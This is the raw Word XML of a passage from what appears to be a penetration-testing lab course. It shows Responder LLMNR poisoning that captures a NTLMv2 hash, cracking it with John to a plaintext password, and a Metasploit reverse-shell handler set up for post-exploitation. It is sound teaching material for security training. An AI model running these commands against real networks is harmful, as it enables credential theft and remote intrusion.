    <w:p w14:paraId="1F3638A0" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Challenge set              [random]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2707C5" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Don't Respond To Names     ['ISATAP']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6212DE" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258974B2" w14:textId="702FA703" w:rsidR="002C7035" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Listening for events...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C087779" w14:textId="77777777" w:rsidR="00FD4003" w:rsidRDefault="00FD4003" w:rsidP="002C7035">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C515F2" w14:textId="73272C72" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C7035">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="139A094A" wp14:editId="018F91FA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>418465</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3711575" cy="2352040"/>
            <wp:effectExtent l="190500" t="190500" r="193675" b="18161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in-wrong-printserv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11575" cy="23520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C7035">
        <w:t>On the windows machine, a user tries to access the printing server “printserver”, but write</w:t>
      </w:r>
      <w:r w:rsidR="00FD4003">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002C7035">
        <w:t xml:space="preserve"> instead “printsever” (without the ‘r’).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B93F769" w14:textId="06ABEA59" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C7035">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DCC14B" w14:textId="15B9FFB8" w:rsidR="002C7035" w:rsidRDefault="002C77C0" w:rsidP="002C7035">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The windows machine tries then to resolve “printsever” and the responder will answer to it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E02F630" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Listening for events...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F9A91" w14:textId="152A9355" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16C712FC" wp14:editId="013904AC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>416560</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4287520" cy="998855"/>
            <wp:effectExtent l="190500" t="190500" r="189230" b="18224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ireshark-dump.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7520" cy="998855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:effectLst>
                      <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
                        <a:srgbClr val="000000">
                          <a:alpha val="70000"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>[*] [LLMNR]  Poisoned answer sent to 192.168.23.120 for name printsever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7269C5E7" w14:textId="6C62C5F5" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C7035">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24513D1E" w14:textId="3D3B88FE" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="002C7035">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30035915" w14:textId="77777777" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="002C7035">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067CF03B" w14:textId="2637C8B9" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C7035">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The Hash is then gathered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D73A9" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[+] Listening for events...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9ADFC6" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [LLMNR]  Poisoned answer sent to 192.168.23.120 for name printsever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87B6C5" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[SMBv2] NTLMv2-SSP Client   : 192.168.23.120</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147BAFE9" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[SMBv2] NTLMv2-SSP Username : HACKLAB\jdupont</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AC1E9F" w14:textId="047E82D1" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[SMBv2] NTLMv2-SSP Hash     : jdupont::HACKLAB:b49732aa93ba6be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w:t>
      </w:r>
      <w:r w:rsidR="002D7B7B">
        <w:t>5007200000000000000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394B9DF7" w14:textId="77777777" w:rsidR="002D7B7B" w:rsidRDefault="002D7B7B" w:rsidP="002C7035">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E4DBEB" w14:textId="6A2F7295" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C7035">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Using John, cracking it is a matter of minutes, even on a personal machine. We make a guess that this user uses common word like a password and add the year as it is required by the Active Directory password policy. Less than 5 minutes are required:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6363F8" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kali:~# john -w=/usr/share/wordlists/rockyou.txt -mask='?w201?d' jdupont_hash.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FF01C0" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Using default input encoding: UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F308E0" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Rules/masks using ISO-8859-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A86964" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0105F" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Press 'q' or Ctrl-C to abort, almost any other key for status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E0EDB2" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>0g 0:00:00:02 0.60% (ETA: 07:27:51) 0g/s 511551p/s 511551c/s 511551C/s brian192012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0CEB29" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRPr="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C77C0">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Reptile2018      (jdupont)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A6362B" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>1g 0:00:03:20 DONE (2018-07-27 07:25) 0.004983g/s 532030p/s 532030c/s 532030C/s Reptile2018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33790B41" w14:textId="77777777" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Use the "--show" option to display all of the cracked passwords reliably</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5422C807" w14:textId="45B18B5D" w:rsidR="002C77C0" w:rsidRDefault="002C77C0" w:rsidP="002C77C0">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395DECC" w14:textId="45375260" w:rsidR="00B80C42" w:rsidRDefault="00B80C42" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc26269451"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Post Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="33C16B92" w14:textId="4B247EB4" w:rsidR="00B45908" w:rsidRDefault="009A2E0A" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once an attacker accessed a system, he can misuse the privileges he has to obtain more privileges on the system or on connected systems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C52B062" w14:textId="084975A5" w:rsidR="00B45908" w:rsidRDefault="00B45908" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Depending the way the attacker managed to get</w:t>
      </w:r>
      <w:r w:rsidR="00C54E3A">
        <w:t xml:space="preserve"> an access</w:t>
      </w:r>
      <w:r>
        <w:t>, he will not have the same right</w:t>
      </w:r>
      <w:r w:rsidR="00C30E59">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the system. He can have </w:t>
      </w:r>
      <w:r w:rsidR="00C54E3A">
        <w:t>root access or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E40D20">
        <w:t>limited</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user </w:t>
      </w:r>
      <w:r w:rsidR="00E40D20">
        <w:t>rights</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C54E3A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0532E56E" w14:textId="3D8093B5" w:rsidR="004F3EBF" w:rsidRPr="008229D3" w:rsidRDefault="004F3EBF" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Sometimes, you can have a s</w:t>
      </w:r>
      <w:r w:rsidR="00133E20">
        <w:t>hell even if there is no visual</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prompt</w:t>
      </w:r>
      <w:r w:rsidR="00133E20">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9D5AA" w14:textId="1630FE68" w:rsidR="00B80C42" w:rsidRDefault="00B80C42" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Upgrade to Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8BA4B" w14:textId="772FD073" w:rsidR="00D14BDC" w:rsidRDefault="00D14BDC" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>We have already introduced Meterpreter in a previous section: it is a particular payload that uses in-memory DLL injection stagers and which is extended over the network at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005CB3A2" w14:textId="45D93655" w:rsidR="00D14BDC" w:rsidRDefault="00D14BDC" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With Meterpreter </w:t>
      </w:r>
      <w:r w:rsidR="00352E33">
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> have access to a bunch of </w:t>
      </w:r>
      <w:r w:rsidR="000268DB">
        <w:t>functionality, which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> include dumping hash, escalat</w:t>
      </w:r>
      <w:r w:rsidR="00352E33">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> privileges, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEA5A31" w14:textId="00E35940" w:rsidR="00857E29" w:rsidRDefault="00857E29" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>When you have a s</w:t>
      </w:r>
      <w:r w:rsidR="00E1695F">
        <w:t>imple shell, it can be useful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> try</w:t>
      </w:r>
      <w:r w:rsidR="00E1695F">
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E1695F">
        <w:t xml:space="preserve">to get </w:t>
      </w:r>
      <w:r>
        <w:t>a Meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF17460" w14:textId="49BB66E9" w:rsidR="00CB4B85" w:rsidRDefault="00857E29" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>This can be achieved using the shell_to_meterpreter module.</w:t>
      </w:r>
      <w:r w:rsidR="00CB4B85">
        <w:t xml:space="preserve"> The sessions command can </w:t>
      </w:r>
      <w:r w:rsidR="0073574F">
        <w:t>also do this, check the help for more details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B3D0D1" w14:textId="0C951BD2" w:rsidR="00D14BDC" w:rsidRDefault="00D14BDC" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F58FE70" w14:textId="6B19B03C" w:rsidR="00D14BDC" w:rsidRDefault="004D01F8" w:rsidP="00857E29">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Get a basic shell session in Metasploit using for example the root bind</w:t>
      </w:r>
      <w:r w:rsidR="00A60E92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">shell vulnerability on MS2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A6EC14" w14:textId="0CAF90AE" w:rsidR="008A454F" w:rsidRDefault="00D14BDC" w:rsidP="00857E29">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upgrade this shell using either the </w:t>
      </w:r>
      <w:r w:rsidR="00AB6032">
        <w:t>sessions command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="00FB489B">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> post exploit</w:t>
      </w:r>
      <w:r w:rsidR="00AB6032">
        <w:t>ation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C62C2AD" w14:textId="4A0F829B" w:rsidR="008A454F" w:rsidRDefault="008A454F" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  ANSWERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1FCE7C" w14:textId="6E0D6A2D" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>First, get a shell exploiting the bind shell available on port 1524:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6237AE27" w14:textId="727A0BB3" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>msf exploit(multi/handler) &gt; set payload linux/x86/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D20ECCE" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>payload =&gt; linux/x86/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43295E1F" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>msf exploit(multi/handler) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CA973" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71CD609D" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>Module options (exploit/multi/handler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F005DF2" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C20F0F1" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   Name  Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C83A46" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   ----  ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70587D" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FF6AB5" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAD7D8A" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>Payload options (linux/x86/shell_reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B60487" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D8905F" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D278AD8" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11063D63" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   CMD    /bin/sh          yes       The command string to execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376DCC4B" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   LHOST  192.168.21.10    yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A431E1C" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   LPORT  1337             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE6C8E0" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB515C2" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1110B242" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48934E57" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56313A91" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A0BA26" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661205BD" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t xml:space="preserve">   0   Wildcard Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C731DDE" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474DB14E" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A97C725" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="006A4C76">
        <w:t>msf exploit(multi/handler) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF86B1" w14:textId="77777777" w:rsidR="006A4C76" w:rsidRPr="006A4C76" w:rsidRDefault="006A4C76" w:rsidP="006A4C76">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
